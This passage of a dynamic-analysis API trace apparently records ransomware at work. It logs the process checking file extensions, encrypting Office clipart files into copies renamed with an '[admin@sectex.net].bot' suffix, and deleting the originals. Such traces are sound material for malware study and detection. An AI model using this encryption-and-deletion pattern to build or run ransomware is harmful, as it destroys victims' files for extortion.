	[0055.332] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.332] lstrlenW (lpString=".pdf") returned 4
	[0055.332] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.332] lstrlenW (lpString=".xls") returned 4
	[0055.332] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.332] lstrlenW (lpString=".xlsx") returned 5
	[0055.332] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.332] lstrlenW (lpString=".ppt") returned 4
	[0055.332] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.333] lstrlenW (lpString=".zip") returned 4
	[0055.333] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.333] lstrlenW (lpString=".rar") returned 4
	[0055.333] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.333] lstrlenW (lpString=".bz2") returned 4
	[0055.333] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.333] lstrlenW (lpString=".7z") returned 3
	[0055.333] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.333] lstrlenW (lpString=".dbf") returned 4
	[0055.333] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.333] lstrlenW (lpString=".1cd") returned 4
	[0055.333] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.333] lstrlenW (lpString=".jpg") returned 4
	[0055.333] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.333] lstrlenW (lpString=".doc") returned 4
	[0055.333] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.333] lstrlenW (lpString=".docx") returned 5
	[0055.333] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.333] lstrlenW (lpString=".pdf") returned 4
	[0055.333] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.333] lstrlenW (lpString=".xls") returned 4
	[0055.333] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.333] lstrlenW (lpString=".xlsx") returned 5
	[0055.333] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.333] lstrlenW (lpString=".ppt") returned 4
	[0055.333] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.333] lstrlenW (lpString=".zip") returned 4
	[0055.333] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.334] lstrlenW (lpString=".rar") returned 4
	[0055.334] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.334] lstrlenW (lpString=".bz2") returned 4
	[0055.334] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.334] lstrlenW (lpString=".7z") returned 3
	[0055.334] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.334] lstrlenW (lpString=".dbf") returned 4
	[0055.334] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.334] lstrlenW (lpString=".1cd") returned 4
	[0055.334] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.334] lstrlenW (lpString=".jpg") returned 4
	[0055.334] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.334] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.334] lstrlenW (lpString="AG00157_.GIF") returned 12
	[0055.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0055.334] GetFileSizeEx (in: hFile=0x224, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=4955) returned 1
	[0055.335] CloseHandle (hObject=0x224) returned 1
	[0055.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 0x20
	[0055.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0055.335] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.335] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0055.335] GetLastError () returned 0x0
	[0055.335] ReadFile (in: hFile=0x224, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x135b, lpOverlapped=0x0) returned 1
	[0055.489] WriteFile (in: hFile=0x170, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1360, lpOverlapped=0x0) returned 1
	[0055.490] ReadFile (in: hFile=0x224, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.491] WriteFile (in: hFile=0x170, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.491] SetEndOfFile (hFile=0x170) returned 1
	[0055.491] CloseHandle (hObject=0x170) returned 1
	[0055.491] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.491] SetEndOfFile (hFile=0x224) returned 1
	[0055.492] CloseHandle (hObject=0x224) returned 1
	[0055.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 1
	[0055.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.492] lstrlenW (lpString=".doc") returned 4
	[0055.492] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.492] lstrlenW (lpString=".docx") returned 5
	[0055.492] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.492] lstrlenW (lpString=".pdf") returned 4
	[0055.492] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.492] lstrlenW (lpString=".xls") returned 4
	[0055.492] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.492] lstrlenW (lpString=".xlsx") returned 5
	[0055.492] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.492] lstrlenW (lpString=".ppt") returned 4
	[0055.493] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.493] lstrlenW (lpString=".zip") returned 4
	[0055.493] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.493] lstrlenW (lpString=".rar") returned 4
	[0055.493] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.493] lstrlenW (lpString=".bz2") returned 4
	[0055.493] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.493] lstrlenW (lpString=".7z") returned 3
	[0055.493] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.493] lstrlenW (lpString=".dbf") returned 4
	[0055.493] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.493] lstrlenW (lpString=".1cd") returned 4
	[0055.493] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.493] lstrlenW (lpString=".jpg") returned 4
	[0055.493] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.493] lstrlenW (lpString=".doc") returned 4
	[0055.493] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.493] lstrlenW (lpString=".docx") returned 5
	[0055.493] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.493] lstrlenW (lpString=".pdf") returned 4
	[0055.493] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.493] lstrlenW (lpString=".xls") returned 4
	[0055.493] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.493] lstrlenW (lpString=".xlsx") returned 5
	[0055.493] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.493] lstrlenW (lpString=".ppt") returned 4
	[0055.493] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.494] lstrlenW (lpString=".zip") returned 4
	[0055.494] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.494] lstrlenW (lpString=".rar") returned 4
	[0055.494] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.494] lstrlenW (lpString=".bz2") returned 4
	[0055.494] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.494] lstrlenW (lpString=".7z") returned 3
	[0055.494] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.494] lstrlenW (lpString=".dbf") returned 4
	[0055.494] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.494] lstrlenW (lpString=".1cd") returned 4
	[0055.494] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63
	[0055.494] lstrlenW (lpString=".jpg") returned 4
	[0055.494] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.494] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.494] lstrlenW (lpString="AG00161_.GIF") returned 12
	[0055.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0055.494] GetFileSizeEx (in: hFile=0x224, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=7583) returned 1
	[0055.494] CloseHandle (hObject=0x224) returned 1
	[0055.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 0x20
	[0055.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0055.495] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.495] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0055.495] GetLastError () returned 0x0
	[0055.495] ReadFile (in: hFile=0x224, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1d9f, lpOverlapped=0x0) returned 1
	[0055.516] WriteFile (in: hFile=0x170, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1da0, lpOverlapped=0x0) returned 1
	[0055.517] ReadFile (in: hFile=0x224, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.517] WriteFile (in: hFile=0x170, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.518] SetEndOfFile (hFile=0x170) returned 1
	[0056.850] CloseHandle (hObject=0x170) returned 1
	[0056.850] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.850] SetEndOfFile (hFile=0x224) returned 1
	[0056.851] CloseHandle (hObject=0x224) returned 1
	[0056.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.851] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 1
	[0057.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.764] lstrlenW (lpString=".doc") returned 4
	[0057.764] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0057.764] lstrlenW (lpString=".docx") returned 5
	[0057.764] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0057.764] lstrlenW (lpString=".pdf") returned 4
	[0057.764] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0057.764] lstrlenW (lpString=".xls") returned 4
	[0057.764] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0057.764] lstrlenW (lpString=".xlsx") returned 5
	[0057.764] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0057.764] lstrlenW (lpString=".ppt") returned 4
	[0057.764] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0057.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.764] lstrlenW (lpString=".zip") returned 4
	[0057.764] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0057.764] lstrlenW (lpString=".rar") returned 4
	[0057.764] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0057.764] lstrlenW (lpString=".bz2") returned 4
	[0057.764] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0057.764] lstrlenW (lpString=".7z") returned 3
	[0057.764] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0057.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.764] lstrlenW (lpString=".dbf") returned 4
	[0057.764] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0057.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.765] lstrlenW (lpString=".1cd") returned 4
	[0057.765] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0057.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.765] lstrlenW (lpString=".jpg") returned 4
	[0057.765] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0057.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.765] lstrlenW (lpString=".doc") returned 4
	[0057.765] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0057.765] lstrlenW (lpString=".docx") returned 5
	[0057.765] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0057.765] lstrlenW (lpString=".pdf") returned 4
	[0057.765] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0057.765] lstrlenW (lpString=".xls") returned 4
	[0057.765] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0057.765] lstrlenW (lpString=".xlsx") returned 5
	[0057.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0057.765] lstrlenW (lpString=".ppt") returned 4
	[0057.765] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0057.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.765] lstrlenW (lpString=".zip") returned 4
	[0057.765] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0057.765] lstrlenW (lpString=".rar") returned 4
	[0057.765] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0057.765] lstrlenW (lpString=".bz2") returned 4
	[0057.765] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0057.765] lstrlenW (lpString=".7z") returned 3
	[0057.765] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0057.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.765] lstrlenW (lpString=".dbf") returned 4
	[0057.765] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0057.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.765] lstrlenW (lpString=".1cd") returned 4
	[0057.766] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0057.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63
	[0057.766] lstrlenW (lpString=".jpg") returned 4
	[0057.766] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0057.766] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0057.766] lstrlenW (lpString="AN00932_.WMF") returned 12
	[0057.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0057.903] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=14428) returned 1
	[0057.903] CloseHandle (hObject=0x188) returned 1
	[0057.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 0x20
	[0057.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0057.904] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.904] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0057.904] GetLastError () returned 0x0
	[0057.904] ReadFile (in: hFile=0x188, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x385c, lpOverlapped=0x0) returned 1
	[0057.939] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x3860, lpOverlapped=0x0) returned 1
	[0057.951] ReadFile (in: hFile=0x188, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0057.951] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0057.951] SetEndOfFile (hFile=0x204) returned 1
	[0058.191] CloseHandle (hObject=0x204) returned 1
	[0058.191] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.191] SetEndOfFile (hFile=0x188) returned 1
	[0058.192] CloseHandle (hObject=0x188) returned 1
	[0058.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.192] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 1
	[0058.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.482] lstrlenW (lpString=".doc") returned 4
	[0058.482] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.482] lstrlenW (lpString=".docx") returned 5
	[0058.482] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.482] lstrlenW (lpString=".pdf") returned 4
	[0058.482] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.482] lstrlenW (lpString=".xls") returned 4
	[0058.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.482] lstrlenW (lpString=".xlsx") returned 5
	[0058.482] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
